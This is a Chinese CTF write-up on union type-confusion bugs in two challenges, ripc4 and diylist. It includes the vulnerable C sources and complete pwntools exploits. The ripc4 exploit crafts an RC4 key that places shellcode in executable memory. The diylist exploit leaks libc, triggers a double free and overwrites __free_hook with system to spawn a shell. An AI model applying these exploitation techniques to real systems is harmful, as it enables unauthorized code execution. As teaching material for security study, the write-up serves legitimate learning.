一个union引发的惨案

一个union引发的惨案
2020-03-24 10:48:24 Author: xz.aliyun.com(查看原文) 阅读量:336 收藏

前言

最近看一些国际赛的题目，遇到了一种之前没有见到过的漏洞，是关于union这个联合类型的错用，漏洞原理很简单，不过比较新奇，这里分享给大家。

题目文件在这里

原题在BUUCTF平台上有复现，感兴趣的同学可以去做下。

预备知识

其实也算不上预备知识，算是小常识，就是union类型的变量的内存区域是共享的，这也是为什么我们用联合这个类型而不是用结构体，它可以应用在多个变量中只用其一的场景中，这里以一个简单的demo举例，定义union var，包含两个成员变量var1,var2，分别设置值并输出，可以看到二者共享一块内存区域，一旦我们修改其一变量，另一个变量的值也会变化，这为我们节省内存带来了便利，然而也造成了一些错用的风险。

// gcc ./poc.c -o poc && ./poc
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Demo union: both members start at the same address, so a store through
   one member changes the bytes observed through the other. */
union var {
    char var1;          /* single-byte view of the shared storage */
    unsigned int var2;  /* unsigned int view of the same storage */
};

/*
 * Demonstrates that union members alias each other: var1 is written,
 * then var2 is written, and var1 is read back to show that its value
 * changed. All three printed addresses are identical.
 */
int main(void)
{
    union var test;
    test.var1 = 'x';
    /* %p requires a void * argument, hence the explicit casts. */
    printf("[*]var1 %c @ %p\n",test.var1,(void *)&test.var1);
    test.var2 = 0x41414141;
    printf("[*]var2 0x%x @ %p\n",test.var2,(void *)&test.var2);
    /* var1 now reads back one byte of var2; every byte is 0x41 ('A'). */
    /* %p already prints the 0x prefix, so no literal "0x" before it. */
    printf("[*]var1 %c @ %p\n",test.var1,(void *)&test.var1);
    return 0;
}
/*
╭─wz@wz-virtual-machine ~/Desktop/CTF/BesidesCTF2020/ripc4 ‹hexo*› 
╰─$ gcc ./poc.c -o poc && ./poc
[*]var1 x @ 0x7fffffffe350
[*]var2 0x41414141 @ 0x7fffffffe350
[*]var1 A @ 0x7fffffffe350
*/

Bsides CTF 2020 ripc4

程序分析

题目给了.c文件，不需要从IDA去看。首先看题目实现的功能，首先关注题目中核心的结构体，这样一个结构体用来表示不同类型的结构

开始需要我们设置ws的类型，这里的ws是通过workspace_t *ws = secure_malloc(sizeof(workspace_t));分配的，我们稍后关注这个函数。

在类型设置完毕之后，我们可以对于不同类型的结构使用不同的功能。核心的逻辑如下，首先对于三种类型的结构，均可以使用set_input函数，用以向input_buf输入数据。而在使用set_encoding功能的时候，会检查是否为TYPE_ENCRYPT类型，是的话则不能使用。过检查后调用set_encoding函数。

// Main command loop (excerpt from the challenge's main function).
// Reads one command per iteration and dispatches on its name. Some
// commands are gated on the workspace type through CHECK_TYPE.
// NOTE(review): CMD_IS is not shown here; presumably it compares `cmd`
// against the given literal.
while (1) {
    print_menu(ws->type);
    char *cmd = prompt("command");
    if (!cmd) {
      // prompt() returned NULL: stop the program.
      printf("Exiting!\n");
      return 0;
    }
    if (CMD_IS("quit") || CMD_IS("exit")) {
      return 0;
    } else if (CMD_IS("set_input")) {
      // Available for every workspace type.
      set_input(ws);
      continue;
    } else if (CMD_IS("set_encoding")) {
      // Rejected when CHECK_TYPE(ws, TYPE_ENCRYPT) holds.
      if (CHECK_TYPE(ws, TYPE_ENCRYPT)) {
        printf("No encoding for encrypted type!\n");
        continue;
      }
      set_encoding(ws);
      continue;
    } else if (CMD_IS("print")) {
      // No type gate here; print_state() does its own CHECK_TYPE tests.
      print_state(ws);
      continue;
    } else if (CMD_IS("set_key")) {
      // Only allowed when CHECK_TYPE(ws, TYPE_ENCRYPT) holds.
      if (!CHECK_TYPE(ws, TYPE_ENCRYPT)) {
        printf("Can only set key for encrypted type.\n");
        continue;
      }
      set_key(ws);
      continue;
    } else if (CMD_IS("encrypt")) {
      // Only allowed when CHECK_TYPE(ws, TYPE_ENCRYPT) holds.
      if (!CHECK_TYPE(ws, TYPE_ENCRYPT)) {
        printf("Can only encrypt for encrypted type.\n");
        continue;
      }
      do_encrypt(ws);
      continue;
    }
    // Unrecognised commands fall through and the loop simply repeats.
  }

所有类型的结构都可以调用print函数。在源码中print_state函数似乎做了类型检查，我们跟进去看一下CHECK_TYPE这个宏，会发现只要满足(ws->type & t) == t即可。而TYPE_ENCRYPT为3，(3 & 2) == 2，因此TYPE_ENCRYPT类型可以绕过这个检查，从而调用ws->print_encoded(ws->input_buf, ws->buf_len);。而这个函数指针是union类型变量的一部分，和enc_state共享内存空间，我们可以通过set_key和do_encrypt来设置这个变量，从而使得程序执行任意指令。

// True when every bit set in `t` is also set in ws->type. This is a bit-mask
// test, NOT an equality test: a workspace of type TYPE_ENCRYPT (3 == 0b11)
// also satisfies CHECK_TYPE(ws, TYPE_ENCODE) and CHECK_TYPE(ws, TYPE_PLAIN).
// Note that the macro arguments are not parenthesised in the expansion.
#define CHECK_TYPE(ws, t) ((ws->type & t) == t)

// Workspace type tags. They are consecutive integers rather than distinct
// bit flags, which is what makes the mask test above overlap.
#define TYPE_PLAIN 1
#define TYPE_ENCODE 2
#define TYPE_ENCRYPT 3

// Print the workspace's input buffer according to its type.
//
// Vulnerable: the first branch uses the bit-mask CHECK_TYPE test, and
// (3 & 2) == 2, so a TYPE_ENCRYPT workspace enters the TYPE_ENCODE branch.
// The final "encrypted" branch is therefore never reached for type 3.
// Per the write-up, print_encoded and enc_state are members of the same
// union in workspace_t (the struct definition is not shown here), so for an
// encrypt workspace the call below jumps to the enc_state buffer.
void print_state(workspace_t *ws) {
  if (CHECK_TYPE(ws, TYPE_ENCODE)) {
    if (!ws->print_encoded) {
      printf("Must use set_encoding first.\n");
      return;
    }
    // Indirect call through the (possibly aliased) function pointer.
    ws->print_encoded(ws->input_buf, ws->buf_len);
  } else if (CHECK_TYPE(ws, TYPE_PLAIN)) {
    printf("%s\n", ws->input_buf);
  } else {
    printf("Printing not supported for encrypted data.\n");
  }
}

只有TYPE_ENCRYPT可以调用set_key函数和do_encrypt函数。

以上是主要功能的分析，下面关注函数细节。

secure_malloc会分配一块可以执行的区域并返回。

// All three protection bits: read, write and execute.
#define PROT_MASK (PROT_READ|PROT_WRITE|PROT_EXEC)
// Despite its name, PROT_RW ORs in PROT_MASK and therefore also contains
// PROT_EXEC: memory mapped with PROT_RW is readable, writable AND executable.
#define PROT_RW (PROT_MASK|PROT_READ|PROT_WRITE)

// Allocate `sz` bytes in an anonymous private mapping bracketed by two
// inaccessible guard pages.
//
// The request is rounded up to a whole number of pages and two extra pages
// are added. The mapping is created with PROT_RW, which (see its
// definition) includes PROT_EXEC, so the returned region is executable.
// On mmap failure an error is printed and the process exits with status 1.
// Returns a pointer to the first byte after the lower guard page.
void *secure_malloc(size_t sz) {
  size_t pg_size = (size_t)sysconf(_SC_PAGESIZE);
  // Round size up
  sz = (sz + pg_size-1) & ~(pg_size-1);
  // Add guard pages
  sz += (pg_size << 1);
  void *ptr = mmap(NULL, sz, PROT_RW, MAP_PRIVATE|MAP_ANONYMOUS|MAP_LOCKED, -1, 0);
  if (ptr == MAP_FAILED) {
    printf("Unable to allocate memory!\n\n");
    printf("Error: %s\n", strerror(errno));
    _exit(1);
  }
  // Record the total mapping size at the start of the lower guard page,
  // before that page is made inaccessible below.
  *(size_t *)ptr = sz;
  // Lower guard page
  // (mprotect return values are not checked.)
  mprotect(ptr, pg_size, PROT_NONE);
  // Upper guard page
  mprotect((char *)ptr+sz-pg_size, pg_size, PROT_NONE);
  return (char *)ptr+pg_size;
}

encode功能实现的是base64的编码以及十六进制的编码。

题目的encrypted部分实现了rc4加密算法，先让用户输入key，之后调用set_key设置密钥，最后调用do_encrypt进行rc4流密码加密。rc4算法可以在网上找到，这里不再赘述。

// Read a hex-encoded key from the user and (re)build the RC4 state in
// ws->enc_state using the RC4 key-scheduling algorithm.
//
// The final contents of enc_state are a permutation fully determined by
// the key, so a chosen key yields a chosen byte sequence in the buffer
// (subject to every byte value appearing exactly once). Per the write-up,
// enc_state shares storage with the print_encoded function pointer.
// NOTE(review): KEY_LEN_MIN, KEY_LEN_MAX and RC4_SZ are defined elsewhere;
// the "& 0xFF" below suggests RC4_SZ is 256 - confirm.
void set_key(workspace_t *ws) {
  char *key_data = prompt("key (hex)");
  if (!key_data) {
    printf("No key!\n");
    return;
  }
  // The length is measured in hex digits: two per key byte, must be even.
  size_t key_len = strlen(key_data);
  if (key_len > (KEY_LEN_MAX * 2) ||
      key_len < (KEY_LEN_MIN * 2) ||
      key_len % 2) {
    printf("Invalid key length!\n");
    return;
  }
  // Decode the hex digits in place: byte i/2 of key_data receives the value
  // of digits i and i+1. The write index never passes the read index.
  for (int i=0;i<key_len;i+=2) {
    int byte;
    int rv = sscanf(&key_data[i], "%02x", &byte);
    if (rv != 1) {
      printf("Invalid key data!\n");
      return;
    }
    key_data[i/2] = (char)(byte & 0xFF);
  }
  // From here on key_len counts decoded bytes, not hex digits.
  key_len = key_len >> 1;
  // Allocate key data
  // Any previous state buffer is released first.
  if (ws->enc_state) {
    secure_free(ws->enc_state);
    ws->enc_state = NULL;
  }
  ws->enc_state = secure_malloc(RC4_SZ);
  // Initial data
  // Identity permutation: enc_state[i] = i.
  for (int i=0;i<RC4_SZ;i++) {
    ws->enc_state[i] = i;
  }
  // Permute from key
  // Standard RC4 KSA: one swap per index, with j driven by the key bytes.
  int j=0;
  for (int i=0;i<RC4_SZ;i++) {
    j = (j + ws->enc_state[i] + key_data[i % key_len]) & 0xFF;
    char tmp = ws->enc_state[i];
    ws->enc_state[i] = ws->enc_state[j];
    ws->enc_state[j] = tmp;
  }
  // key_len was halved above, so key_len * 2 is the original hex length:
  // this wipes the whole input string.
  memset(key_data, 0, key_len * 2);
  printf("Key has been set.\n");
}

// XOR ws->input_buf in place with an RC4 keystream generated from
// ws->enc_state (the RC4 PRGA), over ws->buf_len bytes.
//
// Each generated byte also swaps two entries of enc_state, so calling this
// function changes the state buffer's contents. There is no check here
// that enc_state is non-NULL (i.e. that set_key ran first).
void do_encrypt(workspace_t *ws) {
  // PRGA keystream
  int i=0, j=0;
  for(int k=0;k<ws->buf_len;k++) {
    i += 1;
    i &= 0xFF;
    j += ws->enc_state[i];
    j &= 0xFF;
    // Swap state[i] and state[j].
    int tmp = ws->enc_state[i];
    ws->enc_state[i] = ws->enc_state[j];
    ws->enc_state[j] = tmp;
    // The keystream byte is state[(state[i] + state[j]) mod 256].
    tmp = ws->enc_state[(ws->enc_state[i] + ws->enc_state[j]) & 0xFF];
    ws->input_buf[k] ^= tmp;
  }
  printf("Buffer encrypted!\n");
}

漏洞分析

在程序分析部分我们已经找到了漏洞，即在print_state函数中可以执行任意代码，我们可以将其改为shellcode，之后通过调用print来触发shellcode执行。

具体如下。

我们输入构造好的Key，使得在初始化key数组以及enc_state数组时让enc_state为shellcode。构造的方式也并不难，我们只需要逆一下set_key对于key的变换，固定enc_state，从而得到输入的key。

另外rc4密钥变换的时候是遍历数组，将所有enc_state交换一遍，因为enc_state被初始化为[0,0xff]（即0到0xff每个值各出现一次），因此混淆之后的数组中不会出现两个相同的byte，如此一来，/bin/sh就不能用了（其中'/'出现了两次），可以先构造个读取后续shellcode的sc，之后输入后面get shell的sc即可。

调试到代码执行处下断点，看一眼寄存器的情况，发现我们只需要设置rsi/rdx即可。

exp.py

#coding=utf-8
from pwn import *
import random

# Short aliases for the pwntools tube methods; each takes the tube `p`
# as its first argument.
r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)

# Target is 64-bit Linux; DEBUG logging prints all traffic.
context.update(arch='amd64',os='linux',log_level='DEBUG')
context.terminal = ['tmux','split','-h']
# debug = 1 runs the local binary, debug = 0 connects to the remote service.
debug = 0
elf = ELF('./ripc4')
# libc_offset and gadgets are not referenced by exp() below.
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
if debug:
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    p = process('./ripc4')

else:
    p = remote('node3.buuoj.cn',28819)

# Exploit for ripc4 (Python 2 / pwntools).
# Outline: pick the "encrypted" workspace type, send a key crafted so that
# the RC4 key schedule leaves a small read() stub at the start of enc_state,
# trigger "print" (which calls through the aliased function pointer), then
# send the real shell-spawning shellcode for the stub to read in.
def exp():
    sla(p,"type (plain, encoded, encrypted)> ","encrypted")
    sla(p,"command> ","set_key")
    # Local simulation of the RC4 state; starts as the identity permutation.
    state = range(256)
    target = range(256)

    # Stage 1: read(0, rcx, rdx) with rdx's second byte set to 4.
    # NOTE(review): relies on the register state at the call site observed
    # while debugging (per the write-up only rsi/rdx need setting); rcx
    # presumably points at the enc_state buffer - confirm.
    sc = asm('''
            xor edi,edi
            mov rsi,rcx
            mov dh,0x4
            syscall
            ''')
    sc = list(sc)
    shellcode = [ord(item) for item in sc]
    # Desired final permutation: the stub bytes first, followed by every
    # remaining byte value in ascending order. The stub's bytes must all be
    # distinct because the state is a permutation.
    target = filter(lambda c: not c in shellcode, target)

    target = shellcode + target
    sc = ''.join(chr(item) for item in shellcode)
    print disasm(sc)

    # Invert the key schedule. At step i the target computes
    # j = (j + state[i] + key[i]) & 0xff and swaps state[i] with state[j].
    # Choose key[i] so that j lands on the current position of target[i].
    key_lis = range(256)
    j = 0
    for i in range(256):
        tg = target[i]
        target_idx = state.index(tg)
        temp = target_idx
        # Adding 0x300 keeps the intermediate value non-negative before
        # the final mask.
        temp += 0x300
        temp -= j
        temp -= state[i]
        j = target_idx & 0xff
        key_lis[i] = temp & 0xff
        state[i],state[j] = state[j],state[i]
    # Hex-encode the 256 key bytes, two digits each.
    key = ''.join(hex(item)[2:].zfill(2) for item in key_lis)
    print(key)
    sla(p,"key (hex)> ",key)
    #gdb.attach(p,'b* 0x0000555555554000+0x197c')
    # "print" reaches the indirect call in print_state and runs the stub.
    sla(p,"command> ","print")

    # Stage 2: NOP padding the length of the stub, followed by a standard
    # /bin/sh shellcode, sent as input for the stub's read().
    sc = '\x90'*len(sc)+asm(shellcraft.amd64.linux.sh())
    # Manual pause before sending stage 2.
    raw_input()
    p.sendline(sc)

    p.interactive()

exp()

zer0ptsCTF 2020 diylist

程序逻辑

漏洞环境为ubuntu 18.04/2.27，没有开PIE，Partial RELRO，有canary/NX保护。

还是典型的菜单题，共有add/get/edit/del四个功能。

程序维护了一个伪链表，名为list，实际上并不是传统意义的链表。成员size表示目前链表中的item数量，max指链表所能容纳的最大item数量。

/* Growable array of Data slots (called a "list" by the program). */
typedef struct {
  int size;    /* number of slots currently in use */
  int max;     /* number of slots allocated in `data` */
  Data *data;  /* heap array of slots; NULL until the first insertion */
} List;

/*
 * Create an empty list (size 0, capacity 0, no backing array).
 *
 * Returns a heap-allocated List, or NULL if the allocation fails. The
 * original dereferenced the malloc result without checking it.
 */
List* list_new(void)
{
  List *list = malloc(sizeof *list);
  if (list == NULL)
    return NULL;

  list->size = 0;
  list->max = 0;
  list->data = NULL;

  return list;
}

另一个成员data是联合类型的，其成员有p_char/d_long/d_double。我们add/edit等操作的直接对象就是这样一个data类型的变量。

add函数向list中添加一个成员，这里的链表是用malloc进行分配的，因此它存储在堆上。首先确定用户输入的类型，如果是long/double/str则调用read_long/read_double/read_str读取变量，返回值强制转换为Data类型传给list_add函数。

list_add检查当前的size是否达到了max上限，是的话就为list->data分配一块更大区域存储数据，并将之前数据悉数拷贝至新区域。

如果是long/double类型，则直接插入到后面，如果是str类型则调用strdup将输入拷贝到堆并将堆地址写入到list->data[size]。然后将这个堆地址存储在全局变量fpool里。

/* One list slot. All three members share the same storage and no type tag
   is stored alongside it, so a slot written as one member can later be
   read as any other. */
typedef union {
  char *p_char;     /* pointer to a string */
  long d_long;      /* integer value */
  double d_double;  /* floating-point value */
} Data;

/*
 * Menu handler: ask for an element type, read a value of that type and
 * append it to the list.
 *
 * The (Data)... casts use the GNU C cast-to-union extension to wrap the
 * value in a Data.
 * NOTE(review): read_str's length limit is not visible here; buf is 128
 * bytes - confirm it cannot overflow.
 */
void add(List *list)
{
  char buf[128];
  printf("Type(long=%d/double=%d/str=%d): ", LIST_LONG, LIST_DOUBLE, LIST_STRING);

  switch(read_long()) {
  case LIST_LONG:
    printf("Data: ");
    list_add(list, (Data)read_long(), LIST_LONG);
    break;

  case LIST_DOUBLE:
    printf("Data: ");
    list_add(list, (Data)read_double(), LIST_DOUBLE);
    break;

  case LIST_STRING:
    printf("Data: ");
    read_str(buf);
    /* list_add duplicates the string, so passing the stack buffer is fine. */
    list_add(list, (Data)buf, LIST_STRING);
    break;

  default:
    puts("Invalid option");
    return;
  }
}

/*
 * Add an element
 *
 * Appends `data`, interpreted according to `type`, to the end of the list.
 * The backing array grows by CHUNK_SIZE slots when it is full. For
 * LIST_STRING the string is duplicated with strdup and the copy's address
 * is recorded in the global free pool (if the pool has room) so that it can
 * be released later.
 *
 * Aborts through __list_abort on allocation failure or an unknown type
 * (assumed not to return, as the original code already relied on that).
 * No per-element type tag is stored; that is by design of the original.
 */
void list_add(List* list, Data data, LIST_TYPE type)
{
  if (list->size >= list->max) {
    /* Re-allocate a chunk if the list is full */
    Data *old = list->data;
    int old_max = list->max;  /* capacity of the old buffer */
    list->max += CHUNK_SIZE;

    list->data = (Data*)malloc(sizeof(Data) * list->max);
    if (list->data == NULL)
      __list_abort("Allocation error");

    if (old != NULL) {
      /* Copy and free the old chunk. Copy only the old capacity: the
         original copied (max - 1) slots, which reads past the end of the
         old buffer whenever CHUNK_SIZE > 1. */
      memcpy(list->data, old, sizeof(Data) * old_max);
      free(old);
    }
  }

  /* Store new data */
  switch(type) {
  case LIST_LONG:
    list->data[list->size].d_long = data.d_long;
    break;
  case LIST_DOUBLE:
    list->data[list->size].d_double = data.d_double;
    break;
  case LIST_STRING: {
    char *copy = strdup(data.p_char);
    if (copy == NULL)
      __list_abort("Allocation error");
    list->data[list->size].p_char = copy;
    /* Insert the address to free pool
       so that it'll be freed when the list is deleted */
    if (fpool_num < MAX_FREEPOOL) {
      fpool[fpool_num] = copy;
      fpool_num++;
    }
    break;
  }
  default:
    __list_abort("Invalid type");
  }

  list->size++;
}

get函数输出指定idx的内容，这里注意如何输出取决于我们选择的类型，因为union成员的内存共享，因此对于同样一个data，我们选择long类型，就可以用%ld输出，如果我们选择str类型，就可以用%s输出，是一个类型混淆错误。

/*
 * Menu handler: print the element at a user-supplied index, formatted as
 * the type the USER selects now.
 *
 * Vulnerable (type confusion): the list stores no per-element type, so the
 * requested type need not match the type the slot was written with. A
 * slot holding an arbitrary long can be printed with %s, which
 * dereferences it as a pointer and gives an arbitrary-address read.
 * Note: `index` is a long here but list_get takes an int, so the value is
 * implicitly narrowed at the call.
 */
void get(List *list)
{
  printf("Index: ");
  long index = read_long();

  printf("Type(long=%d/double=%d/str=%d): ", LIST_LONG, LIST_DOUBLE, LIST_STRING);

  switch(read_long()) {
  case LIST_LONG:
    printf("Data: %ld\n", list_get(list, index).d_long);
    break;

  case LIST_DOUBLE:
    printf("Data: %lf\n", list_get(list, index).d_double);
    break;

  case LIST_STRING:
    /* Treats the slot's bits as a char * regardless of how it was stored. */
    printf("Data: %s\n", list_get(list, index).p_char);
    break;

  default:
    puts("Invalid option");
    return;
  }
}

/*
 * Get an element
 *
 * Returns the slot at `index`. Calls __list_abort when the index is
 * outside [0, size). The slot is read through p_char and re-wrapped in a
 * Data (GNU C cast-to-union extension); the caller decides which member to
 * interpret it as.
 */
Data list_get(List* list, int index)
{
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");

  return (Data)list->data[index].p_char;
}

edit可以编辑list->data[index]。这里可以结合之前类型混淆的漏洞利用，比如我们想知道addr处的值，则可以先使用edit的long类型编辑data为addr，而后用get的str部分处理，从而泄露内存内容。

/*
 * Menu handler: overwrite the element at a user-supplied index with a new
 * value of a user-selected type.
 *
 * The new type is not checked against whatever the slot held before, so a
 * slot that held a string pointer can be replaced by an arbitrary long
 * (and vice versa). Together with get()/del() this lets the user plant a
 * chosen address in a slot and have it used as a pointer.
 * NOTE(review): read_str's length limit is not visible here; buf is 128
 * bytes - confirm it cannot overflow.
 */
void edit(List *list)
{
  char buf[128];

  printf("Index: ");
  long index = read_long();
  printf("Type(long=%d/double=%d/str=%d): ", LIST_LONG, LIST_DOUBLE, LIST_STRING);

  switch(read_long()) {
  case LIST_LONG: /* long */
    printf("Data: ");
    list_edit(list, index, (Data)read_long(), LIST_LONG);
    break;

  case LIST_DOUBLE: /* double */
    printf("Data: ");
    list_edit(list, index, (Data)read_double(), LIST_DOUBLE);
    break;

  case LIST_STRING: /* str */
    printf("Data: ");
    read_str(buf);
    list_edit(list, index, (Data)buf, LIST_STRING);
    break;

  default:
    puts("Invalid option");
    return;
  }
}
/*
 * Edit an element
 *
 * Overwrites list->data[index] with `data`, interpreted according to
 * `type`. For LIST_STRING the string is duplicated with strdup and the
 * copy's address is recorded in the global free pool (if the pool has
 * room).
 *
 * Aborts through __list_abort on an out-of-range index, allocation failure
 * or an unknown type (assumed not to return, as the original code already
 * relied on that).
 * The previous contents of the slot are not released here, and no
 * per-element type tag is stored; both are unchanged from the original.
 */
void list_edit(List* list, int index, Data data, LIST_TYPE type)
{
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");

  /* Store the data */
  switch(type) {
  case LIST_LONG:
    list->data[index].d_long = data.d_long;
    break;
  case LIST_DOUBLE:
    list->data[index].d_double = data.d_double;
    break;
  case LIST_STRING: {
    char *copy = strdup(data.p_char);
    if (copy == NULL)
      __list_abort("Allocation error");
    list->data[index].p_char = copy;
    /* Insert the address to free pool. The original registered
       list->data[list->size].p_char here, i.e. the slot one past the last
       element instead of the string that was just stored. */
    if (fpool_num < MAX_FREEPOOL) {
      fpool[fpool_num] = copy;
      fpool_num++;
    }
    break;
  }
  default:
    __list_abort("Invalid type");
  }
}

del删除指定索引的data及fpool存储的堆块，删除方式是从要删除的data后面依次向前覆盖data数据。

之后根据fpool[i] == data.p_char去寻找fpool对应的堆块，注意这里p_char也可以是long类型得到的一个地址，因此结合上edit我们可以控制任意地址的释放，并且free之后并未清空fpool数据。

/*
 * Menu handler: remove the element at a user-supplied index.
 * `index` is a long here but list_del takes an int, so the value is
 * implicitly narrowed at the call.
 */
void del(List *list)
{
  printf("Index: ");
  long index = read_long();

  list_del(list, index);
  puts("Successfully removed");
}
/*
 * Delete an element
 *
 * Removes the slot at `index` by shifting the following slots down one
 * position, then frees the removed value if it equals an address recorded
 * in the free pool. Calls __list_abort when the index is out of range.
 *
 * Vulnerable:
 *  - The pool lookup compares raw pointer values only, so a slot whose
 *    d_long was edited to equal a pooled address is freed as well.
 *  - After free() the matching fpool entry is neither cleared nor removed,
 *    so deleting a second slot holding the same address frees it again
 *    (double free).
 */
void list_del(List* list, int index)
{
  int i;
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");

  /* Keep a copy of the slot being removed for the pool lookup below. */
  Data data = list->data[index];

  /* Shift data list and remove the last one */
  for(i = index; i < list->size - 1; i++) {
    list->data[i] = list->data[i + 1];
  }
  /* i is now size - 1: clear the vacated last slot. */
  list->data[i].d_long = 0;

  list->size--;

  /* Free data if it's in the pool list */
  for(i = 0; i < fpool_num; i++) {
    if (fpool[i] == data.p_char) {
      /* fpool[i] keeps the stale address after this call. */
      free(data.p_char);
      break;
    }
  }
}

漏洞利用

前面提到的free未清空heap地址，结合之前的类型混淆，可以触发double free。因为没有开PIE，我们写入puts@got之后get泄露libc;写入fpool_addr再get可以泄露堆地址。之后我们通过编辑long类型，向list插入chunk0的地址，以使得list中有两个相同的堆地址。而fpool也存储了这个堆地址，我们连续删除这两个idx的data，就能造成double free。

这样我们在ubuntu 18下可以拿tcache attack覆写__free_hook为system并释放一个内容为/bin/sh\x00的堆来get shell。

exp.py

这也是给了源代码的题目，题目用了一个未发行的libc，如果想本地调试的话，可以拿下面命令编译一个。

gcc -c diylist.c
gcc main.c -o main diylist.o

#coding=utf-8
from pwn import *

# Short aliases for the pwntools tube methods; each takes the tube `p`
# as its first argument.
r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)

# Target is 64-bit Linux; DEBUG logging prints all traffic.
context.update(arch='amd64',os='linux',log_level='DEBUG')
context.terminal = ['tmux','split','-h']
# debug = 1 runs the locally built binary with the system libc,
# debug = 0 connects to the remote service and uses the provided libc.
debug = 1
elf = ELF('./main')
# libc_offset and gadgets are not referenced by exp() below.
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
if debug:
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    p = process('./main')

else:
    libc = ELF('./x64_libc.so.6')
    p = remote('f.buuoj.cn',20173)

# Maps a type name to the menu digit announced by the
# "Type(long=1/double=2/str=3)" prompt.
maps = {"long":"1","double":"2","str":"3"}

# Menu option 1: append an element of type `tp` ("long"/"double"/"str").
# `data` is sent raw, without a trailing newline.
def Add(tp,data):
    p.recvuntil('> ')
    p.sendline('1')
    p.recvuntil("Type(long=1/double=2/str=3): ")
    p.sendline(maps[tp])
    p.recvuntil("Data: ")
    p.send(data)

# Menu option 2: ask the target to print element `index` interpreted as
# type `tp`. The reply is left unread for the caller to consume.
def Show(index,tp):
    p.recvuntil('> ')
    p.sendline('2')
    p.recvuntil("Index: ")
    p.sendline(str(index))
    p.recvuntil("Type(long=1/double=2/str=3): ")
    p.sendline(maps[tp])

# Menu option 3: overwrite element `index` with `data` as type `tp`.
# `data` is sent raw, without a trailing newline.
def Edit(index,tp,data):
    p.recvuntil('> ')
    p.sendline('3')
    p.recvuntil("Index: ")
    p.sendline(str(index))
    p.recvuntil("Type(long=1/double=2/str=3): ")
    p.sendline(maps[tp])
    p.recvuntil("Data: ")
    p.send(data)


# Menu option 4: delete element `index`.
def Delete(index):
    p.recvuntil('> ')
    p.sendline('4')
    p.recvuntil("Index: ")
    p.sendline(str(index))


# Exploit for diylist (Python 2 / pwntools).
# Outline: use the long/str type confusion to leak libc and heap addresses,
# make two list slots hold the same pooled heap address, delete both to get
# a double free, then poison the freed chunk's next pointer so a later
# allocation lands on __free_hook, which is overwritten with system.
def exp():
    #leak libc
    # Two string elements; each strdup'd copy is registered in fpool.
    Add("str","/bin/sh")#0
    Add("str","/bin/sh")#1
    puts_got = elf.got["puts"]

    # Store puts@got as a long, then read it back as a string to leak the
    # resolved puts address (possible because the binary is not PIE).
    Edit(0,"long",str(puts_got))

    Show(0,"str")
    p.recvuntil("Data: ")
    libc_base = u64(p.recvline().strip('\n').ljust(8,'\x00')) - libc.sym['puts']
    log.success("libc base => " + hex(libc_base))
    #leak heap
    # Address of the global fpool array (per the write-up); its first entry
    # is the heap address of the first strdup'd string.
    bss_lis = 0x602100
    Edit(0,"long",str(bss_lis))
    Show(0,"str")
    p.recvuntil("Data: ")
    # NOTE(review): 0x2b0 is the offset of that chunk from the heap base in
    # the author's heap layout - confirm for other libc builds.
    heap_base = u64(p.recvline().strip('\n').ljust(8,'\x00')) - 0x2b0
    log.success("heap base => " + hex(heap_base))

    #recover
    # Point both slots at the same pooled chunk.
    Edit(0,"long",str(heap_base+0x2b0))
    Edit(1,"long",str(heap_base+0x2b0))

    # Both deletes match the stale fpool entry: the chunk is freed twice.
    Delete(1)
    Delete(0)
    #gdb.attach(p,'b malloc')
    # First allocation reuses the chunk and writes &__free_hook into it,
    # which the allocator treats as the next free chunk.
    Add("str",p64(libc_base+libc.sym['__free_hook']))
    # Second allocation returns the same chunk again; it now holds "/bin/sh".
    Add("str","/bin/sh\x00")
    # Third allocation lands on __free_hook and stores system there.
    Add("str",p64(libc_base+libc.sym['system']))
    # Freeing slot 0 (the "/bin/sh" chunk) now calls system("/bin/sh").
    Delete(0)
    p.interactive()

exp()

总结

这两道题利用的漏洞原理都是union的变量内存共享，因为变量名的缘故，做题的时候可能会自动代入到对应的类型，而忽略了这个变量在作为其他类型处理时可能会被赋值或读取。不过因为union用的比较少，我们接触过这类漏洞之后，题目中再出现union就容易引起警觉。此外在IDA的反汇编中其实并不会识别出union，对它来讲这只是一个变量而已，因此直接看IDA或许会更容易发现漏洞。

文章来源: http://xz.aliyun.com/t/7410
如有侵权请联系:admin#unsafe.sh